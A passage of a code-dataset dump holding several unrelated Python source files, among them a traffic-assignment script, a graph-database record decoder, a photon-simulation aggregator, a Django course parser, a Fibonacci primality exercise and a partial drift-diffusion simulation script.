fh.write(\"\\n\\n\")\n fh.write(\"~\\tTail\\tHead\\t:\\tVolume\\tCost\\t;\\n\")\n\n # sort by fromNode then toNode for output\n linklist = list(linkdict.iteritems())\n linklist.sort()\n\n for ((nfrom, nto), link) in linklist:\n assert(link.init_node == nfrom)\n assert(link.term_node == nto)\n fh.write(\"\\t%d\\t%d\\t:\\t%f\\t%f\\t;\\n\" %\n (link.init_node, link.term_node, link.volume, link.cost))\n \n \n#-----------------------------------------------------------------------------\n#\n# Main\n#\n#-----------------------------------------------------------------------------\n \ndef usage(progname):\n \"\"\"\n Print usage message and exit\n \"\"\"\n \n sys.stderr.write(\"Usage: \" +progname + \" netfilename demandfilename\\n\")\n sys.exit(1)\n\n\ndef main():\n \"\"\"\n main for cext_traffic_assign.py\n\n Usage: cext_traffic_assign.py netfilename demandfilename\n\n netfilename is name of the net file defining node and links\n demandfilename is name of Origin-Destination demand file\n\n Output is link flows on stdout.\n \n Example usage:\n \n cext_traffic_assign.py SiouxFalls_net.txt SiouxFalls_trips.txt\n \n \"\"\"\n if len(sys.argv) != 3:\n usage(os.path.basename(sys.argv[0]))\n\n netfilename = sys.argv[1]\n demandfilename = sys.argv[2]\n\n net = parse_net_file(netfilename)\n demands = parse_trips_file(demandfilename)\n\n linkdict = net_to_linkdict(net)\n demandsdict = demands_to_demanddict(demands)\n\n total_od_flow = sum(demandsdict.itervalues())\n sys.stderr.write(\"total OD flow = %f\\n\" % total_od_flow)\n\n voldict = dict({ ((link.init_node, link.term_node), link.volume)\n for link in net.links})\n\n iternum = 0\n while max(demandsdict.itervalues()) > 0.0:\n\n old_voldict = dict(voldict)\n assign(net, demands, demandsdict, linkdict)\n update_link_costs(net)\n \n voldict = dict( [((link.init_node, link.term_node), link.volume)\n for link in net.links])\n\n iternum += 1\n\n delta_link_vol =dict([((link.init_node, link.term_node),\n voldict[(link.init_node, link.term_node)]\n - old_voldict[(link.init_node, link.term_node)])\n for link in net.links])\n delta_link_costs = [ delta_link_vol[(link.init_node, link.term_node)]\n * link.volume for link in net.links ]\n \n avg_excess_cost = sum(delta_link_costs) / total_od_flow\n\n sys.stderr.write(\"iter = %d total unsatisfied demand = %f avg excess cost = %f\\n\" % \n (iternum, sum(demandsdict.itervalues()),\n avg_excess_cost))\n\n\n\n \n 
print_flow(sys.stdout, net, linkdict)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"trunk/scripts/cext_traffic_assign.py","file_name":"cext_traffic_assign.py","file_ext":"py","file_size_in_byte":10397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"361030065","text":"import os\nimport sys\n_PATH_ = os.path.dirname(os.path.dirname(__file__))\n\nif _PATH_ not in sys.path:\n sys.path.append(_PATH_)\n\nimport argh\n\nfrom utils.load_data_sets import *\n\n\n# Credit: Brain Lee\n\n# this method doesn't read .sgf recursively from a folder to subfolder\n# make sure dataset looks like this:\n# --|-folder1/.sgfs\n# |-folder2/.sgfs\n# ...\n# |-folderN/.sgfs\ndef preprocess(*data_sets, processed_dir=\"processed_data\"):\n processed_dir = os.path.join(os.getcwd(), processed_dir)\n if not os.path.isdir(processed_dir):\n os.mkdir(processed_dir)\n \n '''\n test_chunk, training_chunks = parse_data_sets(*data_sets)\n print(\"Allocating %s positions as test; remainder as training\" % len(test_chunk), file=sys.stderr)\n\n print(\"Writing test chunk\")\n test_dataset = DataSet.from_positions_w_context(test_chunk, is_test=True)\n test_filename = os.path.join(processed_dir, \"test.chunk.gz\")\n test_dataset.write(test_filename)\n test_dataset = None\n\n training_datasets = map(DataSet.from_positions_w_context, training_chunks)\n for i, train_dataset in enumerate(training_datasets):\n if i % 10 == 0:\n print(\"Writing training chunk %s\" % i)\n train_filename = os.path.join(processed_dir, \"train%s.chunk.gz\" % i)\n train_dataset.write(train_filename)\n print(\"%s chunks written\" % (i+1))'''\n \n sgf_files = list(find_sgf_files(*data_sets))\n print(\"%s sgfs found.\" % len(sgf_files), file=sys.stderr)\n est_num_positions = len(sgf_files) * 200 # about 200 moves per game\n positions_w_context = itertools.chain(*map(get_positions_from_sgf, sgf_files))\n \n positions_w_context = list(positions_w_context)\n test_size = 10**5\n \n print(\"Writing test chunk\")\n test_dataset = DataSet.from_positions_w_context(positions_w_context[:test_size], is_test=True)\n test_filename = os.path.join(processed_dir, \"test.chunk.gz\")\n test_dataset.write(test_filename)\n \n print(\"Writing train chunk\")\n test_dataset = DataSet.from_positions_w_context(positions_w_context[test_size:], is_test=False)\n test_filename = os.path.join(processed_dir, \"train0.chunk.gz\")\n test_dataset.write(test_filename)\n test_dataset = None\n\n\nif __name__==\"__main__\":\n\n p = argh.ArghParser()\n p.add_commands([preprocess])\n p.dispatch()\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"526452693","text":"from typing import Dict\n\nfrom graph_db.engine.types import *\nfrom graph_db.engine.types import DB_TYPE\nfrom .record import Record\n\n\nclass RecordDecoder:\n @staticmethod\n def decode_node_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes node data from a physical node record.\n Node record format:\n 1 byte `in_use` byte\n 4 bytes `label_id` – pointer to record with label in label storage\n 4 bytes `first_rel_id` – pointer to record with first relationship\n 4 bytes `first_prop_id` – pointer to record with first property\n Total: 13 bytes\n :param record: record object\n :return: a dictionary with parsed node data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = 
RecordDecoder._decode_bool(record[:1])\n\n label_id = RecordDecoder._decode_int(record[1:5])\n assert label_id >= 0\n\n first_rel_id = RecordDecoder._decode_int(record[5:9])\n first_prop_id = RecordDecoder._decode_int(record[9:13])\n\n return {'id': idx,\n 'used': used,\n 'label_id': label_id,\n 'first_rel_id': first_rel_id,\n 'first_prop_id': first_prop_id}\n\n @staticmethod\n def decode_relationship_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes relationship data from a physical relationship record.\n Relationship record format:\n 1 byte `in_use` byte\n 4 bytes `start_node` - pointer to record with start node of the relationship\n 4 bytes `end_node` – pointer to record with end node of the relationship\n 4 bytes `label_id` – pointer to record with relationship type in label storage\n 4 bytes `start_prev_id` – pointer to record with prev relationship of start node\n 4 bytes `start_next_id` – pointer to record with next relationship of start node\n 4 bytes `end_prev_id` – pointer to record with prev relationship of end node\n 4 bytes `end_next_id` – pointer to record with next relationship of end node\n 4 bytes `first_prop_id` – pointer to record with first property\n Total: 33 bytes\n :param record: record object\n :return: a dictionary with parsed relationship data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = RecordDecoder._decode_bool(record[:1])\n start_node = RecordDecoder._decode_int(record[1:5])\n end_node = RecordDecoder._decode_int(record[5:9])\n\n label_id = RecordDecoder._decode_int(record[9:13])\n assert label_id >= 0\n\n start_prev_id = RecordDecoder._decode_int(record[13:17])\n start_next_id = RecordDecoder._decode_int(record[17:21])\n end_prev_id = RecordDecoder._decode_int(record[21:25])\n end_next_id = RecordDecoder._decode_int(record[25:29])\n first_prop_id = RecordDecoder._decode_int(record[29:33])\n\n return {'id': idx,\n 'used': used,\n 'start_node': start_node,\n 'end_node': end_node,\n 'label_id': label_id,\n 'start_prev_id': start_prev_id,\n 'start_next_id': start_next_id,\n 'end_prev_id': end_prev_id,\n 'end_next_id': end_next_id,\n 'first_prop_id': first_prop_id}\n\n @staticmethod\n def decode_label_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes label data from a physical label record.\n Label record format:\n 1 byte `in_use` byte\n 4 bytes `dynamic_id` – pointer to first record with label data in dynamic storage\n Total: 5 bytes\n :param record: record object\n :return: a dictionary with parsed label data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = RecordDecoder._decode_bool(record[:1])\n dynamic_id = RecordDecoder._decode_int(record[1:5])\n\n return {'id': idx,\n 'used': used,\n 'dynamic_id': dynamic_id}\n\n @staticmethod\n def decode_property_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes property data from a physical property record.\n Property record format:\n 1 byte `in_use` byte\n 4 bytes `key_id` – pointer to key data in dynamic storage\n 4 bytes `value_id` – pointer to value data in dynamic storage\n 4 bytes `next_prop_id` – pointer to `id` of next property\n Total: 13 bytes\n :param record: record object\n :return: a dictionary with parsed property data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n used = RecordDecoder._decode_bool(record[:1])\n\n key_id = RecordDecoder._decode_int(record[1:5])\n assert key_id >= 0\n\n value_id = RecordDecoder._decode_int(record[5:9])\n assert value_id >= 0\n\n next_prop_id = RecordDecoder._decode_int(record[9:13])\n\n return {'id': idx,\n 
'used': used,\n 'key_id': key_id,\n 'value_id': value_id,\n 'next_prop_id': next_prop_id}\n\n @staticmethod\n def decode_dynamic_data_record(record: Record) -> Dict[str, DB_TYPE]:\n \"\"\"\n Decodes dynamic data from a physical dynamic record.\n Dynamic record format:\n 1 byte number of bytes taken by data\n 27 bytes data\n 4 bytes pointer to `id` of next_chunk\n Total: 32 bytes\n :param record: record object\n :return: a dictionary with parsed dynamic data\n \"\"\"\n idx = record.idx\n assert idx >= 0\n\n data_size = RecordDecoder._decode_int(record[:1])\n data = RecordDecoder._decode_str(record[1:data_size+1])\n next_chunk_id = RecordDecoder._decode_int(record[28:32])\n\n return {'id': idx,\n 'data': data,\n 'next_chunk_id': next_chunk_id}\n\n @staticmethod\n def _decode_int(data: bytes, n_bytes: int = 4) -> int:\n return int.from_bytes(data[:n_bytes], byteorder=BYTEORDER, signed=SIGNED)\n\n @staticmethod\n def _decode_bool(data: bytes, n_bytes: int = 1) -> bool:\n return bool.from_bytes(data[:n_bytes], byteorder=BYTEORDER, signed=SIGNED)\n\n @staticmethod\n def _decode_str(data: bytes) -> str:\n return data.decode(encoding=ENCODING)\n","sub_path":"src/graph_db/fs/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"81509506","text":"import json\nimport os\nimport sys\nimport math\nimport ROOT\n\n\nwavelength = sys.argv[1]\neffRun = sys.argv[2]\nthickness = sys.argv[3]\n\n#wavelength = 130\n#effRun = '0.715_AA'\n#thickness = 0.5\n\npathToDir = '/data/miniclean/data/VUV/data/'+str(wavelength)+'nm/'+str(effRun)+'/'+str(thickness)+'_um/pythonFiles/'\njsonFileNames = []\nrootFileNames = []\nfor aFileName in os.listdir(pathToDir):\n\tif '.json' in aFileName:\n\t\tjsonFileNames.append(aFileName)\n\tif '.root' in aFileName:\n\t\trootFileNames.append(aFileName)\n\nnumVisDetect = 0\nnumVisEscapeSample = 0\nnumVisEscapeDownstream = 0\nnumVisEscapeUpstream = 0\nnumVisEscapeSideways = 0\nnumVisCreatedByUV = 0\nnumVisCreatedByVis = 0\nnumPhotonsAbsTPB = 0\nnumUVPenetratedTPB = 0\nincidentUVPhotons = 0\n\nnumVisDetectFromVis = 0 \nnumVisDetectFromUV = 0\ntotalNumberOfVis = 0\n\ntest = 0\n\nfor iFile in range(len(jsonFileNames)):\n\ttempFilename = pathToDir+'sim_'+str(iFile).zfill(3)+'.json'\n\t#print tempFilename\n\ttempData = json.load(open(tempFilename,'r'))\n\n\tincidentUVPhotons += tempData['UVPhotonsPassThroughUpstream']\n\t\n\tfor aName in tempData['UVStepEndVolumes'].keys():\n\t\tif aName in ['tpbVolume','acrylicSampleDisk']:\n\t\t\tnumUVPenetratedTPB += tempData['UVStepEndVolumes'][aName]\n\n\tnumPhotonsAbsTPB += tempData['UVStepEndVolumes']['tpbVolume']\n\n\tnumVisCreatedByUV += tempData['VisPhotonsCreatedByParentUV']\n\tnumVisCreatedByVis += tempData['VisPhotonsNotCreatedByParentUV']\n\n\tfor aName in tempData['VisStepEndVolumes'].keys():\n\t\ttotalNumberOfVis += tempData['VisStepEndVolumes'][aName]\n\t\tif aName in ['tpbVolume','acrylicSampleDisk','downstreamTrackingDisk_substrate']:\n\t\t\tcontinue\n\t\telse:\n\t\t\tnumVisEscapeSample += tempData['VisStepEndVolumes'][aName]\n\n\ttry:\n\t\ttest += tempData['VisStepEndVolumes']['downstreamTrackingDisk_substrate']\n\texcept:\n\t\tpass\n\n\tnumVisEscapeDownstream += tempData['VisPhotonsEscDownstream']\n\tnumVisEscapeUpstream += tempData['VisPhotonsEscUpstream']\n\tnumVisEscapeSideways += tempData['VisPhotonsEscSideways']\n\n\tnumVisDetect += tempData['vis_detect_count']\n\n\tnumVisDetectFromVis += 
tempData['VisPhotonDetectedFromVis']\n\tnumVisDetectFromUV += tempData['VisPhotonDetectedFromUV']\n\nT_uv = float(numUVPenetratedTPB)/float(incidentUVPhotons)\nuT_uv = T_uv*math.sqrt( (math.sqrt(numUVPenetratedTPB)/numUVPenetratedTPB)**2 + (math.sqrt(incidentUVPhotons)/incidentUVPhotons)**2 )\n\nf_UV_abs = float(numPhotonsAbsTPB)/float(numUVPenetratedTPB)\nuf_UV_abs = f_UV_abs*math.sqrt( (math.sqrt(numPhotonsAbsTPB)/numPhotonsAbsTPB)**2 + (math.sqrt(numUVPenetratedTPB)/numUVPenetratedTPB)**2 )\n\ne_UV = float(numVisCreatedByUV)/float(numPhotonsAbsTPB)\nue_UV = math.sqrt( (math.sqrt(numVisCreatedByUV)/numVisCreatedByUV)**2 + (math.sqrt(numPhotonsAbsTPB)/numPhotonsAbsTPB)**2 )\n\ntotVisCreated = numVisCreatedByUV+numVisCreatedByVis\ne_tot = float(totVisCreated)/float(numPhotonsAbsTPB)\nue_tot = math.sqrt( (math.sqrt(totVisCreated)/totVisCreated)**2 + (math.sqrt(numPhotonsAbsTPB)/numPhotonsAbsTPB)**2 )\n\nf_vis_escape = float(numVisEscapeSample)/float(totVisCreated)\nuf_vis_escape = math.sqrt( (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 + (math.sqrt(totVisCreated)/totVisCreated)**2 )\n\nf_vis_fwd_escape = float(numVisEscapeDownstream)/float(numVisEscapeSample)\nuf_vis_fwd_escape = math.sqrt( (math.sqrt(numVisEscapeDownstream)/numVisEscapeDownstream)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nf_vis_bwd_escape = float(numVisEscapeUpstream)/float(numVisEscapeSample)\nuf_vis_bwd_escape = math.sqrt( (math.sqrt(numVisEscapeUpstream)/numVisEscapeUpstream)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nf_vis_side_escape = float(numVisEscapeSideways)/float(numVisEscapeSample)\nuf_vis_side_escape = math.sqrt( (math.sqrt(numVisEscapeSideways)/numVisEscapeSideways)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nf_visEsc_detect = float(numVisDetect)/float(numVisEscapeSample)\nuf_visEsc_detect = math.sqrt( (math.sqrt(numVisDetect)/numVisDetect)**2 + (math.sqrt(numVisEscapeSample)/numVisEscapeSample)**2 )\n\nvics_g = float(numVisDetect)/float(incidentUVPhotons)\nuvics_g = math.sqrt( (math.sqrt(numVisDetect)/numVisDetect)**2 + (math.sqrt(incidentUVPhotons)/incidentUVPhotons)**2 )\n\nf_visDetect_fromVis = float(numVisCreatedByVis)/float(totVisCreated)\nif numVisCreatedByVis == 0:\n\tuf_visDetect_fromVis = 0\nelse:\n\tuf_visDetect_fromVis = math.sqrt( (math.sqrt(numVisCreatedByVis)/numVisCreatedByVis)**2 + (math.sqrt(totVisCreated)/totVisCreated)**2)\n\n# Some other interesting ratios/checksums\nf_visCreated_UVCreated = float(numVisCreatedByVis)/float(numVisCreatedByUV)\nf_visCreatedDetect_UVCreatedDetect = float(numVisDetectFromVis)/float(numVisDetectFromUV)\ntotalVisPhotonCheckSum = totalNumberOfVis - (numVisCreatedByUV + numVisCreatedByVis)\n\ndictOut = {'T_uv':T_uv,'uT_uv':uT_uv,'f_UV_abs':f_UV_abs,'uf_UV_abs':uf_UV_abs,'e_UV':e_UV,'ue_UV':ue_UV,'e_tot':e_tot,'ue_tot':ue_tot,'f_vis_escape':f_vis_escape,'uf_vis_escape':uf_vis_escape,\n\t\t 'f_visEsc_detect':f_visEsc_detect,'uf_visEsc_detect':uf_visEsc_detect,'f_vis_fwd_escape':f_vis_fwd_escape,'uf_vis_fwd_escape':uf_vis_fwd_escape,\n\t\t 'f_vis_bwd_escape':f_vis_bwd_escape,'uf_vis_bwd_escape':uf_vis_bwd_escape,'f_vis_side_escape':f_vis_side_escape,'uf_vis_side_escape':uf_vis_side_escape,\n\t\t 'numVisDetect':numVisDetect,'numVisEscapeSample':numVisEscapeSample,'numVisEscapeDownstream':numVisEscapeDownstream,'numVisEscapeUpstream':numVisEscapeUpstream,'numVisEscapeSideways':numVisEscapeSideways,\n\t\t 
'numVisCreatedByUV':numVisCreatedByUV,'numVisCreatedByVis':numVisCreatedByVis,'numPhotonsAbsTPB':numPhotonsAbsTPB,'numUVPenetratedTPB':numUVPenetratedTPB,'incidentUVPhotons':incidentUVPhotons,\n\t\t 'numVisDetectFromVis':numVisDetectFromVis,'numVisDetectFromUV':numVisDetectFromUV,'totalNumberOfVis':totalNumberOfVis,\n\t\t 'vics_g':vics_g,'uvics_g':uvics_g,'f_visDetect_fromVis':f_visDetect_fromVis,'uf_visDetect_fromVis':uf_visDetect_fromVis}\n\nfileOut = open(pathToDir+'../concatOutput.json','w+')\njson.dump(dictOut,fileOut)\nfileOut.close()\n\n# Concat the root files\nhistNames = []\nhists = []\nfirstFile = None\nfor iFile in range(len(rootFileNames)):\n\tif iFile == 0:\n\t\tfirstFile = ROOT.TFile.Open(pathToDir+'sim_'+str(iFile).zfill(3)+'.root')\n\t\tfor keyName in firstFile.GetListOfKeys():\n\t\t\thistNames.append(keyName.GetName())\n\t\t\thists.append(firstFile.Get(keyName.GetName()))\n\telse:\n\t\ttempFile = ROOT.TFile.Open(pathToDir+'sim_'+str(iFile).zfill(3)+'.root')\n\t\tfor keyName in tempFile.GetListOfKeys():\n\t\t\ttempIndex = histNames.index(keyName.GetName())\n\t\t\thists[tempIndex].Add((tempFile.Get(keyName.GetName()).Clone()),1)\n\nrootFileOut = ROOT.TFile(pathToDir+'../concatPlotsOut.root','RECREATE')\nfor aHist in hists:\n\trootFileOut.WriteTObject(aHist)\nrootFileOut.Close()\n\n#math.sqrt( (math.sqrt()/)**2 + (math.sqrt()/)**2 )\n\n","sub_path":"geoFactorSim/newGeoSim/machineSweep/GAF/concatFractionsAndPlots.py","file_name":"concatFractionsAndPlots.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"263137277","text":"import chardet\nimport copy\nimport json\nimport logging\nimport re\nfrom datetime import date\nfrom lxml import etree\n\nfrom django.db import transaction\n\nfrom .. 
 import models\n\nlogger = logging.getLogger('web')\n\ndef setCourse(filename):\n    \"\"\"\n    Parse the course file and store the required information in the database.\n    :param filename:\n    :return:\n    \"\"\"\n    logger.debug('start set course')\n    itemList = []\n    try:\n        with open('./display/courses/'+filename,'rb') as courseHtml:\n            html = courseHtml.read()\n            charset = chardet.detect(html[:500])['encoding']\n            if charset == 'GB2312':\n                try:\n                    text = html.decode('GBK')\n                    logger.debug('decode success')\n                except Exception as e:\n                    logger.debug(charset+' decode error')\n                    logger.error(e)\n                    return False\n            else:\n                try:\n                    text = html.decode(charset)\n                    logger.debug('decode success')\n                except Exception as e:\n                    logger.debug(charset+' decode error')\n                    logger.error(e)\n                    return False\n\n            html = etree.HTML(text)\n\n            htmlTr = html.xpath('//tr')\n            delCN = re.compile(u'[^0-9\\-,,]')\n            for dataHtml in htmlTr:\n                item = models.Course()\n                data = dataHtml.xpath('./td/text()')\n                if len(data) < 7:\n                    continue\n                if 'M' in data[6] or 'N' in data[6] or 'H' in data[6] or 'G' in data[6]:\n                    item.courseNo = data[0].strip()\n                    item.courseNum = data[1].strip()\n                    item.courseCredits = data[2].strip()\n                    item.courseName = data[3].strip()\n                    item.courseDepart = data[4].strip()\n                    item.instructor = data[5].strip()\n                    item.courseAddr = data[6].strip()\n                    item.courseDate = data[7].strip()\n                    item.courseSession = data[8].strip()\n                    week = data[9].strip()\n                    item.courseMax = data[10].strip()\n                    week = delCN.sub(r'',week)\n                    if ',' in week:\n                        weeks = week.split(',')\n                        for week in weeks:\n                            temp = models.Course()\n                            if '-' in week:\n                                weekList = week.split('-')\n                                item.startWeek = weekList[0]\n                                item.endWeek = weekList[1]\n                            else:\n                                item.startWeek = week\n                                item.endWeek = week\n                            temp = copy.deepcopy(item)\n                            itemList.append(temp)\n                    else:\n                        if '-' in week:\n                            weekList = week.split('-')\n                            item.startWeek = weekList[0]\n                            item.endWeek = weekList[1]\n                        else:\n                            item.startWeek = week\n                            item.endWeek = week\n                        itemList.append(item)\n                else:\n                    continue\n\n    except Exception as e:\n        logger.error(e)\n        logger.debug('open file error')\n        return False\n\n    try:\n        with transaction.atomic(using='mysql'):\n            models.Course.objects.all().delete()\n            models.Course.objects.bulk_create(itemList)\n            logger.info('course data update success')\n            return True\n\n    except Exception as e:\n        logger.error(e)\n        logger.debug('mysql modify error')\n        return False\n\ndef getTodyCourse(addr):\n    \"\"\"\n    datas = Course.objects.filter(courseAddr__contains='M')\n    .filter(startWeek__lte=7 ).filter(courseAddr__contains='303').exclude(endWeek__lte=6)\n    :param addr:\n    :return:\n    \"\"\"\n    try:\n        config = models.Config.objects.get(myKey='startTime')\n    except Exception as e:\n        logger.error(e)\n        logger.debug('config does not exist')\n        status = 412\n        data = 'config not found'\n        return {'status':status,'data':json.dumps(data)}\n\n    if len(addr) > 1:\n        status = 400\n        data = 'invalid request'\n\n    elif addr in 'MNGH':\n        startDay = config.startTime\n        today = date.today()\n        result = (today - startDay).days\n        day = result%7 + 1\n        week = int(result/7) + 1\n        items = models.Course.objects.filter(courseAddr__contains=addr)\\\n            .filter(startWeek__lte=week).exclude(endWeek__lte=week-1)\\\n            .filter(courseDate__contains=day)\n        dataList = []\n        for item in items:\n            data = {\n                'courseNo':item.courseNo,\n                'courseNum':item.courseNum,\n                'courseCredits':item.courseCredits,\n                'courseName':item.courseName,\n                'courseDepart':item.courseDepart,\n                'instructor':item.instructor,\n                'courseAddr':item.courseAddr,\n                'courseDate':item.courseDate,\n                'courseSession':item.courseSession,\n                'startWeek':item.startWeek,\n                
'endWeek':item.endWeek,\n                'courseMax':item.courseMax,\n            }\n            dataList.append(data)\n        data = dataList\n        status = 200\n    else:\n        status = 400\n        data = 'invalid request'\n    return {'status':status,'data':json.dumps(data,ensure_ascii=False)}\n\n\ndef setConfig(startTime):\n    try:\n        item = models.Config()\n        timeList = startTime.split('-') # placed here for testing; properly this should go before the with block\n        with transaction.atomic(using='mysql'):\n            models.Config.objects.get(myKey='startTime').delete()\n            item.myKey = 'startTime'\n            item.startTime = date(int(timeList[0]), int(timeList[1]), int(timeList[2]))\n            item.save()\n        return True\n    except Exception as e:\n        logger.error(e)\n        return False\n\n\nif __name__ == '__main__':\n    setCourse('2019spring-course.html')\n    pass\n","sub_path":"Backend/tigaBackend/display/functions/Course.py","file_name":"Course.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"588095307","text":"def Fibonacci(x):\n    if x==0:\n        return 0\n    elif x==1:\n        return 1\n    else:\n        a , b = 0 , 1\n        for i in range(x):\n            a , b = b , a+b\n        return a\n\n\n\ndef PrimeNum(x):\n    if x==1:\n        return False\n    elif x==2:\n        return True\n    elif x>2:\n        import random\n        Used_a = []\n        for i in range(20):\n            while True:\n                #making sure that those 20 random numbers will be different from each other.\n                a=random.randint(1, 100000)\n                acceptable=True\n                for j in Used_a:\n                    if a==j:\n                        acceptable = False\n                if acceptable==True:\n                    Used_a.append(a)\n                    break\n            if ((a**x-a)%x!=0):\n                return False\n        return True\n\n\n\n#asking the user for input\nNumber = int(input(\"Give the Fibonacci number you want: \"))\n\n\n\n# 0 is neither prime nor composite!\nif Number==0:\n    print(\"It is NOT a prime number!\")\nelse:\n    FibNumber = Fibonacci(Number)\n    if PrimeNum(FibNumber)==True:\n        print(\"It is a prime number!\")\n    else:\n        print(\"It is NOT a prime number!\")\n","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"565244399","text":"# Load packages\nimport tensorflow as tf\nfrom tensorflow.python.client import device_lib\nfrom tensorflow import keras\nimport numpy as np\nimport pandas as pd\nimport os\nimport pickle\nimport time\nimport uuid\nimport scipy as scp\nimport scipy.stats as scps\nfrom scipy.optimize import differential_evolution\nfrom datetime import datetime\nimport yaml\n\n# Load my own functions\nimport keras_to_numpy as ktnp\nfrom kde_training_utilities import kde_load_data # Want to overcome\nimport cddm_data_simulation as cds\nimport boundary_functions as bf\n\n# SUPPORT FUNCTIONS ------------\ndef make_params(param_bounds = [], param_bounds_epsilon =[]):\n    params = np.zeros(len(param_bounds))\n    \n    for i in range(len(params)):\n        params[i] = np.random.uniform(low = param_bounds[i][0] + param_bounds_epsilon[i], high = param_bounds[i][1] - param_bounds_epsilon[i]) \n    return params\n\n# def get_params_from_meta_data(file_path  = ''):\n#     # Loading meta data file (,,) (simulator output at this point)\n#     tmp = pickle.load(open(file_path, 'rb'))[2]\n#     params = []\n#     # for loop makes use of common structure of simulator outputs across models\n#     for key in tmp.keys():\n#         # delta_t signifies start of simulator parameters that we don't care about for our purposes here\n#         if key == 'delta_t':\n#             break\n#         # variance parameter not used thus far, others added\n#         if key != 's':\n#             params.append(key)\n#     return params \n\ndef adjust_params_names_group(params 
= ['v', 'a', 'w'], \n params_bounds = [], \n params_bounds_epsilon= [],\n param_varies = [0, 0, 1],\n n_subjects = 3):\n params_adj = []\n params_bounds_adj = []\n params_bounds_epsilon_adj = []\n cnt = 0\n for p in params:\n if param_varies[cnt]:\n for i in range(n_subjects):\n params_adj.append(p + '_' + str(i))\n params_bounds_adj.append(params_bounds[cnt])\n params_bounds_epsilon_adj.append(params_bounds_epsilon[cnt])\n else:\n params_adj.append(p)\n params_bounds_adj.append(params_bounds[cnt])\n params_bounds_epsilon_adj.append(params_bounds_epsilon[cnt])\n cnt += 1\n return params_adj, params_bounds_adj, params_bounds_epsilon_adj\n\ndef make_data(param_bounds = [],\n param_bounds_epsilon = [],\n param_is_boundary_param = [0, 0, 1],\n param_names = ['v', 'a', 'w']):\n \n # Generate set of parameters\n tmp_params = make_params(param_bounds = param_bounds, param_bounds_epsilon = param_bounds_epsilon)\n\n # Define boundary parameters \n boundary_params = {}\n cnt = 0\n \n for param in parameter_names:\n if param_is_boundary_param[cnt]:\n boundary_params[param] = tmp_params[cnt]\n cnt += 1\n\n # Run model simulations: MANUAL INTERVENTION TD: AUTOMATE\n ddm_dat_tmp = cds.ddm_flexbound(v = tmp_params[param_names.index('v')],\n a = tmp_params[param_names.index('a')],\n w = tmp_params[param_names.index('w')],\n s = 1,\n delta_t = 0.001,\n max_t = 20,\n n_samples = n_samples,\n boundary_fun = boundary, # function of t (and potentially other parameters) that takes in (t, *args)\n boundary_multiplicative = boundary_multiplicative, # CAREFUL: CHECK IF BOUND\n boundary_params = boundary_params)\n\n data_np = np.concatenate([ddm_dat_tmp[0], ddm_dat_tmp[1]], axis = 1)\n return data_np, tmp_params\n\ndef make_data_group(param_bounds = [],\n param_bounds_epsilon = [],\n param_is_boundary_param = [0, 0, 1], \n params_ordered = ['v', 'a', 'w', 'node', 'theta'],\n param_varies = [0, 0, 1],\n params_names = ['v', 'a', 'w_0', 'w_1', 'w_2'],\n n_subjects = 3):\n \n # Generate set of parameters\n tmp_params_full = make_params(param_bounds = param_bounds, param_bounds_epsilon = param_bounds_epsilon)\n data = {}\n for i in range(n_subjects):\n tmp_params = ktnp.get_tmp_params(params = tmp_params_full,\n params_ordered = params_ordered,\n param_varies = param_varies,\n params_names = params_names,\n idx = i)\n \n # Define boundary parameters \n boundary_params = {}\n cnt = 0\n\n for param in parameter_names:\n if param_is_boundary_param[cnt]:\n boundary_params[param] = tmp_params[cnt]\n cnt += 1\n\n # Run model simulations: MANUAL INTERVENTION TD: AUTOMATE\n ddm_dat_tmp = cds.ddm_flexbound(v = tmp_params[params_ordered.index('v')],\n a = tmp_params[params_ordered.index('a')],\n w = tmp_params[params_ordered.index('w')],\n s = 1,\n delta_t = 0.01,\n max_t = 20,\n n_samples = n_samples,\n boundary_fun = boundary, # function of t (and potentially other parameters) that takes in (t, *args)\n boundary_multiplicative = boundary_multiplicative, # CAREFUL: CHECK IF BOUND IS MULTIPLICATIVE\n boundary_params = boundary_params)\n\n data[str(i)] = np.concatenate([ddm_dat_tmp[0], ddm_dat_tmp[1]], axis = 1)\n return data, tmp_params_full\n\n# -------------------------------\n\nif __name__ == \"__main__\":\n \n # Initializations -------------\n print('Running intialization ....')\n \n # Get configuration from yaml file\n print('Reading config file .... 
